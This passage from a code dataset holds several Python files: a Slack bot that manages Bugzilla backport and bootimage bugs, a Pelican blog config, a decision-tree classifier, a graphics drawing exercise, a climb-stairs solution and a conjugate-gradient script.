slack_sdk API. Assume transient\n # network problem; don't send message.\n print(e)\n except Exception:\n send(f'Caught exception:\\n```\\n{traceback.format_exc()}```')\n return wrapper\n\n\nclass Registry(type):\n '''Metaclass that creates a dict of functions registered with the\n register decorator.'''\n\n def __new__(cls, name, bases, attrs):\n cls = super().__new__(cls, name, bases, attrs)\n registry = []\n for f in attrs.values():\n command = getattr(f, 'command', None)\n if command is not None:\n registry.append((command, f))\n registry.sort(key=lambda t: t[1].doc_order)\n cls._registry = OrderedDict(registry)\n return cls\n\n\ndef register(command, args=(), doc=None, fast=False, complete=True):\n '''Decorator that registers the subcommand handled by a function.'''\n def decorator(f):\n f.command = command\n f.args = args\n f.doc = doc\n f.doc_order = time.time() # hack alert!\n f.fast = fast\n f.complete = complete\n return f\n return decorator\n\n\nclass CommandHandler(metaclass=Registry):\n '''Wrapper class to handle a single event in a thread. 
Creates its own\n network clients for thread safety.'''\n\n def __init__(self, config, event):\n self._config = config\n self._event = event\n self._client = WebClient(token=config.slack_token)\n self._bz = Bugzilla(config)\n self._called = False\n\n def __call__(self):\n assert not self._called\n self._called = True\n\n message = self._event.text.replace(f'<@{self._config.bot_id}>', '').strip()\n words = message.split()\n # Match the longest available subcommand\n for count in range(len(words), 0, -1):\n f = self._registry.get(tuple(words[:count]))\n if f is not None:\n @report_errors\n def wrapper(_config):\n if not f.fast:\n self._react('hourglass_flowing_sand')\n try:\n args = words[count:]\n if len(args) != len(f.args):\n if f.args:\n argdesc = ' '.join(f'<{a}>' for a in f.args)\n raise Fail(f'Bad arguments; expect `{argdesc}`.')\n else:\n raise Fail('This command takes no arguments.')\n f(self, *args)\n except Fail as e:\n self._react('x')\n self._reply(str(e))\n # convert to HandledError to indicate that we've\n # displayed this message\n raise HandledError()\n except Exception:\n self._react('boom')\n raise\n finally:\n if not f.fast:\n self._client.reactions_remove(\n channel=self._event.channel,\n timestamp=self._event.ts,\n name='hourglass_flowing_sand'\n )\n if f.complete:\n self._react('ballot_box_with_check')\n # report_errors() requires the config to be the first argument\n threading.Thread(target=wrapper, name=f.__name__,\n args=(self._config,)).start()\n return\n\n # Tried all possible subcommand lengths, found nothing in registry\n self._reply(f\"I didn't understand that. Try `<@{self._config.bot_id}> help`\")\n self._react('x')\n\n def _react(self, name):\n '''Add an emoji to a command mention.'''\n self._client.reactions_add(channel=self._event.channel,\n name=name, timestamp=self._event.ts)\n\n def _reply(self, message, at_user=True):\n '''Reply to a command mention.'''\n if at_user:\n message = f\"<@{self._event.user}> {message}\"\n self._client.chat_postMessage(channel=self._event.channel,\n text=message,\n # start a new thread or continue the existing one\n thread_ts=self._event.get('thread_ts', self._event.ts),\n # disable Shodan link unfurls\n unfurl_links=False, unfurl_media=False)\n\n def _bug_link(self, bug, text=None, icon=False):\n '''Format a Bug into a Slack link.'''\n def link(format):\n start, icon_, stop = format[0].strip(), f':{format[1:-1]}: ' if icon else '', format[-1].strip()\n text_ = str(text) if text else bug.summary\n return f'{start}<{self._config.bugzilla_bug_url}{str(bug.id)}|{icon_}{escape(text_)}>{stop}'\n if bug.status in ('NEW', 'ASSIGNED'):\n return link('*bugzilla*')\n if bug.status == 'POST':\n if self._bz.BOOTIMAGE_BUG_BUILT_WHITEBOARD in self._bz.whiteboard(bug):\n if self._bz.BOOTIMAGE_BUG_VERIFIED in bug.cf_verified:\n return link('_large_green_circle_')\n return link(' test_tube ')\n return link(' branch ')\n if bug.status in ('MODIFIED', 'ON_QA', 'VERIFIED', 'CLOSED'):\n return link('~checkyes~')\n return link('¿thinking_face?')\n\n @register(('backport',), ('bz-url-or-id', 'minimum-release'),\n doc='ensure there are backport bugs down to minimum-release')\n def _backport(self, desc, min_ver):\n '''Ensure the existence of backport bugs for the specified BZ,\n in all releases >= the specified one.'''\n # Fail if release is invalid or current\n if min_ver not in self._config.releases:\n raise Fail(f'Unknown release \"{escape(min_ver)}\".')\n if min_ver == self._config.releases.current.label:\n raise Fail(f\"{escape(min_ver)} is the 
current release; can't backport.\")\n\n # Look up the bug. This validates the product and component.\n bug = self._bz.getbug(desc, [\n 'assigned_to',\n 'groups',\n 'severity',\n 'version',\n ])\n if bug.severity == 'unspecified':\n # Eric-Paris-bot will unset the target version without a severity\n raise Fail(\"Bug severity is not set; can't backport.\")\n\n # Query existing backport bugs\n backports = self._bz.get_backports(bug, min_ver=min_ver)\n\n # Query bootimages if needed\n need_bootimage = self._bz.BOOTIMAGE_BUG_WHITEBOARD in self._bz.whiteboard(bug)\n if need_bootimage:\n self._bz.ensure_bootimage_bug_allowed(bug)\n bootimages = self._bz.get_bootimages(fields=['blocks'])\n\n # First, do checks\n created_bootimages = []\n for rel in list(self._config.releases.at_least(min_ver).previous.values())[len(backports):]:\n if need_bootimage:\n if rel.label not in bootimages:\n bootimages[rel.label], created = self._bz.create_bootimage(rel, fields=['blocks'])\n if created:\n created_bootimages.append(self._bug_link(bootimages[rel.label], rel.label))\n groups = bug.groups\n allow_groups = self._config.get('backport_allow_groups', [])\n if allow_groups:\n groups = list(set(groups) & set(allow_groups))\n if bug.groups and not groups:\n raise Fail(\"Cannot add any of the bug's groups to new clones, and refusing to create a public bug.\")\n\n # Walk each backport version\n cur_bug = bug\n later_rel = self._config.releases.current\n created_bugs = []\n all_bugs = []\n for rel in self._config.releases.at_least(min_ver).previous.values():\n if backports:\n # Have an existing bug\n cur_bug = backports.pop(0)\n else:\n # Make a new one\n depends = [cur_bug.id]\n if need_bootimage:\n depends.append(bootimages[rel.label].id)\n info = self._bz.api.build_createbug(\n product=bug.product,\n component=bug.component,\n version=bug.version,\n summary=f'[{rel.label}] {bug.summary}',\n description=f'Backport the fix for bug {bug.id} to {rel.label}.',\n assigned_to=bug.assigned_to,\n keywords=bug.keywords,\n depends_on=depends,\n groups=groups,\n severity=bug.severity,\n status='ASSIGNED',\n target_release=rel.target\n )\n info['cf_clone_of'] = cur_bug.id\n if need_bootimage:\n info['cf_devel_whiteboard'] = self._bz.BOOTIMAGE_BUG_WHITEBOARD\n bz = self._bz.api.createbug(info).id\n cur_bug = self._bz.getbug(bz)\n created_bugs.append(self._bug_link(cur_bug, rel.label))\n if need_bootimage:\n # Ensure this bootimage bump is blocked by the one for\n # the more recent release. Thus we dynamically track\n # bootimage dependencies rather than imposing a fixed\n # relationship between bumps in adjacent releases. 
For\n # example, a bump for 4.6 may coalesce the contents of\n # two 4.7 bumps.\n if bootimages[rel.label].id not in bootimages[later_rel.label].blocks:\n info = self._bz.api.build_update(\n blocks_add=[bootimages[rel.label].id],\n )\n self._bz.api.update_bugs([bootimages[later_rel.label].id], info)\n all_bugs.append(self._bug_link(cur_bug, rel.label))\n later_rel = rel\n\n created_bugs.reverse()\n all_bugs.reverse()\n message = ''\n if created_bootimages:\n message += f'Created bootimage trackers: {\", \".join(created_bootimages)}\\n'\n if created_bugs:\n message += f'Created bugs: {\", \".join(created_bugs)}\\n'\n message += f'All backports: {\", \".join(all_bugs)}'\n self._reply(message, at_user=False)\n\n @register(('bootimage', 'create'), ('release',),\n doc='create bootimage bump (usually done automatically as needed)')\n def _bootimage_create(self, label):\n try:\n rel = self._config.releases[label]\n except KeyError:\n raise Fail(f'Unknown release \"{escape(label)}\".')\n bug, created = self._bz.create_bootimage(rel)\n link = self._bug_link(bug, rel.label)\n self._reply(f'{\"Created\" if created else \"Existing\"} bootimage tracker: {link}', at_user=False)\n\n @register(('bootimage', 'list'), doc='list upcoming bootimage bumps')\n def _bootimage_list(self):\n '''List bootimage bump BZs.'''\n\n sections = (\n ('Planned bootimage bumps', 'ASSIGNED'),\n ('Pending bootimage bumps', 'POST'),\n )\n report = []\n for caption, status in sections:\n bootimages = self._bz.get_bootimages(status=status)\n if not bootimages:\n continue\n report.append(f'\\n*_{caption}_*:')\n for label, rel in self._config.releases.items():\n try:\n bootimage = bootimages[label]\n except KeyError:\n # nothing for this release\n continue\n bugs = self._bz.get_bootimage_bugs(bootimage, rel)\n report.append('\\n*For* ' + self._bug_link(bootimage, label) + ':')\n for bug in bugs:\n report.append(self._bug_link(bug, icon=True))\n if not bugs:\n report.append('_no bugs_')\n if not report:\n report.append('No bootimage bumps.')\n self._reply('\\n'.join(report), at_user=False)\n\n @register(('bootimage', 'bug', 'add'), ('bz-url-or-id',),\n doc='add a bug and its backports to planned bootimage bumps')\n def _bootimage_bug_add(self, desc):\n '''Add a bug and its backports to planned bootimage bumps.'''\n # Look up the bug. 
This validates the product and component.\n bug = self._bz.getbug(desc)\n self._bz.ensure_bootimage_bug_allowed(bug)\n\n # Get planned bootimage bumps\n bootimages = self._bz.get_bootimages(fields=['blocks'])\n\n # Get bug and its backports\n bugs = [bug] + self._bz.get_backports(bug)\n\n # First, do checks\n created_bootimages = []\n for rel, cur_bug in zip(self._config.releases.values(), bugs):\n assert cur_bug.target_release[0] in rel.targets\n if rel.label not in bootimages:\n bootimages[rel.label], created = self._bz.create_bootimage(rel, fields=['blocks'])\n if created:\n created_bootimages.append(self._bug_link(bootimages[rel.label], rel.label))\n if self._bz.BOOTIMAGE_BUG_WHITEBOARD not in self._bz.whiteboard(cur_bug):\n if cur_bug.status not in ('NEW', 'ASSIGNED', 'POST'):\n raise Fail(f'Refusing to add bug {cur_bug.id} in {cur_bug.status} to bootimage bump.')\n\n # Add to bootimage bumps; generate report\n later_rel = None\n added_bugs = []\n all_bugs = []\n for rel, cur_bug in zip(self._config.releases.values(), bugs):\n link = self._bug_link(cur_bug, rel.label)\n all_bugs.append(link)\n if self._bz.BOOTIMAGE_BUG_WHITEBOARD not in self._bz.whiteboard(cur_bug):\n bootimage = bootimages[rel.label]\n update = self._bz.api.build_update(\n depends_on_add=[bootimage.id],\n )\n update['cf_devel_whiteboard'] = f'{cur_bug.cf_devel_whiteboard} {self._bz.BOOTIMAGE_BUG_WHITEBOARD}'\n self._bz.api.update_bugs([cur_bug.id], update)\n added_bugs.append(link)\n if later_rel is not None:\n # Ensure this bootimage bump is blocked by the one for\n # the more recent release. Thus we dynamically track\n # bootimage dependencies rather than imposing a fixed\n # relationship between bumps in adjacent releases. For\n # example, a bump for 4.6 may coalesce the contents of\n # two 4.7 bumps.\n if bootimages[rel.label].id not in bootimages[later_rel.label].blocks:\n info = self._bz.api.build_update(\n blocks_add=[bootimages[rel.label].id],\n )\n self._bz.api.update_bugs([bootimages[later_rel.label].id], info)\n later_rel = rel\n\n # Show report\n added_bugs.reverse()\n all_bugs.reverse()\n message = ''\n if created_bootimages:\n message += f'Created bootimage trackers: {\", \".join(created_bootimages)}\\n'\n if added_bugs:\n message += f'Added to bootimage: {\", \".join(added_bugs)}\\n'\n message += f'All bugs: {\", \".join(all_bugs)}'\n self._reply(message, at_user=False)\n\n @register(('bootimage', 'bug', 'built'), ('bz-url-or-id',),\n doc='mark a bug landed in an RHCOS build and ready for QE')\n def _bootimage_bug_built(self, desc):\n # Look up the bug. This validates the product and component.\n bug = self._bz.getbug(desc)\n self._bz.ensure_bootimage_bug_allowed(bug)\n\n if self._bz.BOOTIMAGE_BUG_WHITEBOARD not in self._bz.whiteboard(bug):\n raise Fail(f'Bug {bug.id} is not attached to a bootimage bump.')\n if bug.status not in ('NEW', 'ASSIGNED', 'POST'):\n raise Fail(f'Refusing to mark bug {bug.id} built from status {bug.status}.')\n if self._bz.BOOTIMAGE_BUG_BUILT_WHITEBOARD not in self._bz.whiteboard(bug):\n update = self._bz.api.build_update(\n status='POST',\n flags=[\n {'name': 'reviewed-in-sprint', 'status': '+'},\n ],\n comment=\"This bug has been reported fixed in a new RHCOS build and is ready for QE verification. To mark the bug verified, set the Verified field to Tested. 
This bug will automatically move to MODIFIED once the fix has landed in a new bootimage.\",\n )\n update['cf_devel_whiteboard'] = f'{bug.cf_devel_whiteboard} {self._bz.BOOTIMAGE_BUG_BUILT_WHITEBOARD}'\n self._bz.api.update_bugs([bug.id], update)\n\n @register(('bootimage', 'bug', 'list'),\n doc='list bugs on upcoming bootimage bumps')\n def _bootimage_bug_list(self):\n sections = (\n ('Planned bootimage bumps', 'ASSIGNED'),\n ('Pending bootimage bumps', 'POST'),\n )\n report = []\n for caption, status in sections:\n bootimages = self._bz.get_bootimages(status=status)\n progenitors = {} # progenitor bug ID -> Bug\n groups = {} # progenitor bug ID -> [bug links]\n canonical = {} # backport bug ID -> progenitor bug ID\n for label, rel in self._config.releases.items():\n try:\n bootimage = bootimages[label]\n except KeyError:\n # nothing for this release\n continue\n bugs = self._bz.get_bootimage_bugs(bootimage, rel,\n fields=['cf_clone_of'])\n for bug in bugs:\n # Find the progenitor from this bug's parent. Maybe\n # there is none, and we're the progenitor.\n progenitor = canonical.get(bug.cf_clone_of, bug.id)\n # Add the next link in the ancestry chain\n canonical[bug.id] = progenitor\n # If we're the progenitor, record bug details\n progenitors.setdefault(progenitor, bug)\n # Associate this bug's link with the progenitor\n groups.setdefault(progenitor, []).append(\n self._bug_link(bug, rel.label, icon=True)\n )\n if progenitors:\n report.append(f'\\n*_{caption}_*:')\n for bz, bug in sorted(progenitors.items()):\n report.append(f'• {escape(bug.summary)} [{\", \".join(groups[bz])}]')\n if not report:\n report.append('No bootimage bumps.')\n self._reply('\\n'.join(report), at_user=False)\n\n @register(('release', 'list'), doc='list known releases',\n fast=True, complete=False)\n def _release_list(self):\n report = []\n for rel in reversed(self._config.releases.values()):\n report.append(f'{rel.label}: *{rel.target}* {\" \".join(rel.aliases)}')\n body = \"\\n\".join(report)\n self._reply(f'Release: *default-target* other-targets\\n{body}\\n', at_user=False)\n\n @register(('ping',), doc='check whether the bot is running properly',\n fast=True)\n def _ping(self):\n # Check Bugzilla connectivity\n try:\n if not self._bz.api.logged_in:\n raise Exception('Not logged in.')\n except Exception:\n # Swallow exception details and just report the failure\n raise Fail('Cannot contact Bugzilla.')\n\n @register(('help',), doc='print this message', fast=True, complete=False)\n def _help(self):\n commands = []\n for command, f in self._registry.items():\n if f.doc is not None:\n commands.append('`{}{}{}` - {}'.format(\n ' '.join(command),\n ' ' if f.args else '',\n ' '.join((f'<{a}>' for a in f.args)),\n f.doc\n ))\n self._reply(HELP.replace('%commands%', '\\n'.join(commands)),\n at_user=False)\n\n @register(('throw',), fast=True, complete=False)\n def _throw(self):\n # undocumented\n raise Exception(f'Throwing exception as requested by <@{self._event.user}>')\n\n\n@report_errors\ndef process_event(config, socket_client, req):\n '''Handler for a Slack event.'''\n payload = DottedDict(req.payload)\n\n if req.type == 'events_api' and payload.event.type == 'app_mention':\n if payload.event.channel != config.channel:\n # Don't even acknowledge events outside our channel, to\n # avoid interfering with separate instances in other\n # channels.\n return\n\n # Acknowledge the event, as required by Slack.\n resp = SocketModeResponse(envelope_id=req.envelope_id)\n socket_client.send_socket_mode_response(resp)\n\n with 
Database(config) as db:\n if not db.add_event(payload.event.channel, payload.event.event_ts):\n # When we ignore some events, Slack can send us duplicate\n # retries. Detect and ignore those after acknowledging.\n return\n\n CommandHandler(config, payload.event)()\n\n\n@report_errors\ndef periodic(config, db, bz, maintenance):\n '''Run periodic tasks.'''\n\n # Prune database\n if maintenance:\n with db:\n db.prune_events()\n\n # Find bugs with status MODIFIED or later which are attached to bootimage\n # bumps in POST or earlier, and move the bugs back to POST.\n for status in ('ASSIGNED', 'POST'):\n bz.update_bootimage_bug_status(\n status,\n ['MODIFIED', 'ON_QA', 'VERIFIED', 'CLOSED'],\n 'POST',\n 'The fix for this bug will not be delivered to customers until it lands in an updated bootimage. That process is tracked in bug {bootimage}, which has status {status}. Moving this bug back to POST.',\n )\n\n # Find POST+built bugs which are attached to bootimage bumps in MODIFIED\n # or ON_QA, and move them to MODIFIED.\n for status in ('MODIFIED', 'ON_QA'):\n bz.update_bootimage_bug_status(\n status,\n ['POST'],\n 'MODIFIED',\n 'The fix for this bug has landed in a bootimage bump, as tracked in bug {bootimage} (now in status {status}). Moving this bug to MODIFIED.',\n built=True,\n )\n\n # Find POST+built bugs with reviewed-in-sprint- and set\n # reviewed-in-sprint+.\n if maintenance:\n bugs = bz.query(\n status='POST',\n whiteboard=' '.join([\n bz.BOOTIMAGE_BUG_WHITEBOARD,\n bz.BOOTIMAGE_BUG_BUILT_WHITEBOARD,\n ]),\n flag='reviewed-in-sprint-',\n )\n if bugs:\n bz.api.update_bugs([b.id for b in bugs], bz.api.build_update(\n flags=[\n {'name': 'reviewed-in-sprint', 'status': '+'},\n ],\n # Don't send email\n minor_update=True\n ))\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Bugzilla helper bot for Slack.')\n parser.add_argument('-c', '--config', metavar='FILE',\n default='~/.rhcosbot', help='config file')\n parser.add_argument('-d', '--database', metavar='FILE',\n default='~/.rhcosbot-db', help='database file')\n args = parser.parse_args()\n\n # Read config\n with open(os.path.expanduser(args.config)) as fh:\n config = DottedDict(yaml.safe_load(fh))\n config.database = os.path.expanduser(args.database)\n config.releases = Releases.from_config(config)\n env_map = (\n ('RHCOSBOT_SLACK_APP_TOKEN', 'slack-app-token'),\n ('RHCOSBOT_SLACK_TOKEN', 'slack-token'),\n ('RHCOSBOT_BUGZILLA_KEY', 'bugzilla-key')\n )\n for env, config_key in env_map:\n v = os.environ.get(env)\n if v:\n setattr(config, config_key, v)\n\n # Connect to services\n client = WebClient(token=config.slack_token)\n # store our user ID\n config.bot_id = client.auth_test()['user_id']\n bz = Bugzilla(config)\n if not bz.api.logged_in:\n raise Exception('Did not authenticate')\n db = Database(config)\n\n # Start socket-mode listener in the background\n socket_client = SocketModeClient(app_token=config.slack_app_token,\n web_client=WebClient(token=config.slack_token))\n socket_client.socket_mode_request_listeners.append(\n lambda socket_client, req: process_event(config, socket_client, req))\n socket_client.connect()\n\n # Run periodic tasks\n maint_period = config.bugzilla_maintenance_interval // config.bugzilla_poll_interval\n for i in itertools.count():\n periodic(config, db, bz, i % maint_period == 0)\n time.sleep(config.bugzilla_poll_interval)\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"rhcosbot.py","file_name":"rhcosbot.py","file_ext":"py","file_size_in_byte":41706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"553550630","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = u'ProjectKitsune'\nSITENAME = u\"ProjectKitsune\"\nSITEURL = ''\n\nPATH = 'content'\n\nTIMEZONE = 'UTC'\n\nDEFAULT_LANG = u'en'\n\nFEED_ALL_ATOM = 'feeds/atom.xml'\nCATEGORY_FEED_ATOM = 'feeds/categories/%s/atom.xml'\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\nTAG_FEED_ATOM = 'feeds/tags/%s/atom.xml'\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (\n ('rss', FEED_ALL_ATOM),\n)\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\n# RELATIVE_URLS = True\n\nTHEME = 'theme'\nDELETE_OUTPUT_DIRECTORY = True\nINDEX_SAVE_AS = 'blog/index.html'\nDELETE_OUTPUT_DIRECTORY = True\nARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/'\nARTICLE_SAVE_AS = '{}/index.html'.format(ARTICLE_URL)\nMENUITEMS = (\n ('Blog', '/blog'),\n ('FoxBSD', '/pages/foxbsd.html'),\n ('Development', '/pages/development.html'),\n)\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"436031874","text":"\nfrom math import log\n\n\ndef shannon_entropy(dataset):\n \"\"\"[summary]\n\n Arguments:\n dataset {[type]} -- [description]\n\n Returns:\n [type] -- [description]\n \"\"\"\n count = len(dataset)\n\n label_dict = {} # an empty dict\n\n for row in dataset:\n key = row[-1]\n if key not in label_dict.keys():\n label_dict[key] = 0\n\n label_dict[key] += 1\n\n entropy = 0.0\n\n for key in label_dict:\n prob = float(label_dict[key] / count)\n entropy = entropy - prob * log(prob, 2)\n\n return entropy\n\n\ndef split_dataset(dataset, feature_index, feature_value):\n \"\"\"\n Arguments:\n dataset {2d matrix} -- the last column is class, all other columns\n are features. each row represents one data sample.\n feature_index {int} -- the index of feature used to split dataset\n feature_value {int} -- only data samples that have value at \"feature_index\"\n equals to \"feature_value\" are copied into sub_dataset.\n\n Returns:\n [2D Matrix] -- a sub_dataset, all samples in the sub_dataset\n have the value at \"feature_index\" equals \"feature_value\".\n the column of \"feature_index\" is removed in the sub_dataset.\n i.e. columns_of_sub_dataset = columns_of_dataset - 1\n \"\"\"\n sub_dataset = []\n\n for row in dataset:\n if row[feature_index] == feature_value:\n sub_row = row[:]\n del(sub_row[feature_index])\n sub_dataset.append(sub_row)\n\n return sub_dataset\n\n\ndef choose_best_feature_to_split(dataset):\n \"\"\" decide which feature is best to split dataset\n\n iterate over all features, split dataset busing each feature,\n calculate the entropy of each split, find the feature whose splt\n has the lowest entropy.\n\n Arguments:\n dataset {2d matrix} -- the last column is class, all other columns\n are features. 
each row represents one data sample.\n\n    Returns:\n        [int] -- the feature column index whose split has lowest entropy\n    \"\"\"\n    feature_count = len(dataset[0]) - 1\n\n    best_feature = -1\n    best_entropy = float('inf')\n\n    for i in range(feature_count):\n        feature_list = [row[i] for row in dataset]\n        unique_vals = set(feature_list)\n        new_entropy = 0.0\n\n        for value in unique_vals:\n            sub_dataset = split_dataset(dataset, i, value)\n            prob = len(sub_dataset)/float(len(dataset))\n            new_entropy += prob * shannon_entropy(sub_dataset)\n\n        if (new_entropy < best_entropy):\n            best_entropy = new_entropy\n            best_feature = i\n\n    return best_feature\n\n\ndef majority_count(label_list):\n    label_dict = {}\n\n    for item in label_list:\n        if item not in label_dict.keys():\n            label_dict[item] = 0\n        label_dict[item] += 1\n\n    # sort (label, count) pairs by count so the most common label comes first\n    sorted_items = sorted(label_dict.items(), key=lambda kv: kv[1], reverse=True)\n    return sorted_items[0][0]\n\n\ndef create_tree(dataset, feature_names):\n    \"\"\" create a decision tree for the input dataset\n\n    Arguments:\n        dataset {2d matrix} -- the last column is class, all other columns\n        are features. each row represents one data sample.\n        feature_names {list of strings} -- names of each feature\n            columns_of_feature_names = columns_of_dataset - 1\n\n    Returns:\n        [dict] -- tree as dict\n    \"\"\"\n    label_list = [row[-1] for row in dataset]\n\n    # there is only one unique value in class_list\n    if label_list.count(label_list[0]) == len(label_list):\n        return label_list[0]\n\n    # there is no feature left to classify\n    if len(dataset[0]) == 1:\n        return majority_count(label_list)\n\n    best_feature_index = choose_best_feature_to_split(dataset)\n    best_feature_names = feature_names[best_feature_index]\n\n    tree = {best_feature_names: {}}\n\n    sub_feature_names = feature_names[:]\n    del(sub_feature_names[best_feature_index])\n\n    unique_vals = set([row[best_feature_index] for row in dataset])\n\n    for val in unique_vals:\n        sub_dataset = split_dataset(dataset, best_feature_index, val)\n        tree[best_feature_names][val] = create_tree(sub_dataset, sub_feature_names)\n\n    return tree\n\n\ndef classify(input_tree, feature_names, test_sample):\n    \"\"\" classify a test sample by walking the decision tree\n\n    Arguments:\n        input_tree {dict} -- decision tree produced by create_tree\n        feature_names {list of strings} -- names of each feature\n        test_sample {list} -- feature values of the sample to classify\n\n    Returns:\n        the predicted class label, or None if the sample's feature value\n        does not appear in the tree\n    \"\"\"\n    root_feature_name = list(input_tree.keys())[0]\n    second_dict = input_tree[root_feature_name]\n    feature_index = feature_names.index(root_feature_name)\n\n    classify_result = None  # default when the feature value is missing from the tree\n\n    for key in second_dict.keys():\n        if test_sample[feature_index] == key:\n            if type(second_dict[key]).__name__ == \"dict\":\n                classify_result = classify(second_dict[key], feature_names, test_sample)\n            else:\n                classify_result = second_dict[key]\n\n    return classify_result\n\n\n\n\ndef test_dataset():\n    dataset = [[1, 1, 'yes'], [1, 1, 'yes'], [1, 0, 'no'], [0, 1, 'no'], [0, 1, 'no']]\n    feature_names = ['no surfacing', 'flippers']\n\n    tree = create_tree(dataset, feature_names)\n    print(tree)\n\n    t = classify(tree, feature_names, [1, 1])\n    print(t)\n\n\n\ndef contact_lens_type():\n    fr = open(\"dataset/lenses.txt\")\n    lens_dataset = [line.strip().split(\"\\t\") for line in fr.readlines()]\n\n    feature_names = [\"age\", \"prescript\", \"astigmatic\", \"tear_rate\"]\n\n    lens_tree = create_tree(lens_dataset, feature_names)\n\n    print(lens_tree)\n\n\ncontact_lens_type()\n","sub_path":"book-ml-action/decision_trees.py","file_name":"decision_trees.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
+{"seq_id":"592266024","text":"from graphics import *\n\ndef main():\n doorColour, lightsOn, house_number, window_size = getInputs()\n drawHouse(doorColour, lightsOn, house_number, window_size)\n\n\ndef getInputs():\n window_size = int(\n input(\"Please enter the size of the window (single value):\"))\n doorColour = input(\"Enter door colour: \")\n lightsYN = input(\"Are the lights on (y/n): \")\n lightsOn = lightsYN[0] == \"y\"\n housenumber = int(input(\"Please enter the house number: \"))\n return doorColour, lightsOn, housenumber, window_size\n\n\ndef drawHouse(doorColour, lightsOn, house_number, window_size):\n win = GraphWin(\"House\", window_size, window_size)\n win.setCoords(200, 200, 0, 0)\n\n roof = Polygon(Point(2, 60), Point(42, 2),\n Point(158, 2), Point(198, 60))\n roof.setFill(\"pink\")\n roof.draw(win)\n # draw wall and door\n drawRectangle(win, Point(2, 60), Point(198, 198), \"brown\")\n drawRectangle(win, Point(30, 110), Point(80, 198), doorColour)\n # house_number\n message = Text(Point(55, 154), house_number).draw(win)\n # draw window\n if lightsOn:\n windowColour = \"yellow\"\n else:\n windowColour = \"black\"\n drawRectangle(win, Point(110, 110), Point(170, 170), windowColour)\n win.getMouse()\n\n\ndef drawRectangle(win, point1, point2, colour):\n rectangle = Rectangle(point1, point2)\n rectangle.setFill(colour)\n rectangle.setOutline(colour)\n rectangle.draw(win)\n\n\nmain()\n","sub_path":"T1 Week 8/street.py","file_name":"street.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"399997504","text":"class Solution:\n # @param A : integer\n # @return an integer\n def climbStairs(self, A):\n if A <= 1:\n return A\n\n dp = [0] * A\n\n dp[0] = 1\n dp[1] = 2\n\n for i in range(2, A):\n dp[i] = dp[i - 1] + dp[i - 2]\n\n return dp[-1]\n\n\nprint(Solution().climbStairs(3) == 3)\nprint(Solution().climbStairs(30) == 1346269)\n","sub_path":"ib/level_7/dynamic_programming/climb_stairs.py","file_name":"climb_stairs.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168653635","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Mar 17 09:23:31 2019\r\n\r\n@author: jiryi\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.linalg as spla\r\nimport matplotlib.pyplot as plt\r\n\r\ndef data_prepare(dimension):\r\n \r\n basis1 = [1.0/(i+1) for i in np.arange(dimension)]\r\n basis2 = [1.0/(dimension+i) for i in np.arange(dimension)]\r\n A = spla.hankel(basis1,basis2)\r\n b = np.ones((dimension,))\r\n \r\n return A,b\r\n\r\ndef conjugate_gradient(x):\r\n \r\n # data preparation\r\n dimension = len(x)\r\n A, b = data_prepare(dimension)\r\n r = np.matmul(A,x) - b\r\n p = -r\r\n r_norm = np.linalg.norm(r)\r\n r_norm_arr = []\r\n r_norm_arr.append(r_norm)\r\n \r\n # parameter set up\r\n tol = 10**(-6)\r\n MaxIte = 500\r\n i = 0\r\n \r\n print(\"\\n\")\r\n print(\"Now report results in %s-D case\" % dimension)\r\n while r_norm > tol:\r\n \r\n alpha = np.dot(r,r) / np.dot(p,np.matmul(A,p))\r\n x = x + alpha*p\r\n r_prev = r\r\n r = r + alpha*np.matmul(A,p)\r\n beta = np.dot(r,r) / np.dot(r_prev,r_prev)\r\n p = -r + beta*p\r\n r_norm = np.linalg.norm(r)\r\n \r\n i = i+1\r\n r_norm_arr.append(r_norm)\r\n \r\n if i%50 == 0:\r\n print(\"Iteration: {}, residual norm: {}\\n\".format(i,r_norm))\r\n \r\n if i > MaxIte:\r\n print(\"Cannot converge within {} iterations.\\n\".format(MaxIte))\r\n break\r\n 
\r\n    print(\"Terminate at iteration {}, the residual norm is {}\\n\".format(i,r_norm))\r\n    print(\"the final solution is:\\n {}\".format(x))\r\n    \r\n    return x,r_norm_arr\r\n\r\ndef vis(residual_norm,dimension):\r\n    plt.figure()\r\n    plt.plot(np.log10(residual_norm),\"-*\")\r\n    plt.xlabel(\"# of iterations\")\r\n    plt.ylabel(\"residual norm in log10 scale\")\r\n    plt.title(\"%s-D case\" % dimension)\r\n    plt.show()\r\n\r\nif __name__ == \"__main__\":\r\n    \r\n    dimension = [5, 8, 12, 20]\r\n    for d in dimension:\r\n        \r\n        x = np.zeros((d,))\r\n        x,r_norm_arr = conjugate_gradient(x)\r\n        vis(r_norm_arr,d)","sub_path":"conjugate_gradient.py","file_name":"conjugate_gradient.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"105331552","text":"#!/usr/bin/python3\r\n\r\nfrom reporter.uhl_reports.i2b2.patient_mapping_tests import (\r\n    PatientMappingDuplicatesReport,\r\n    PatientMappingMultiplesIdsReport,\r\n)\r\nfrom 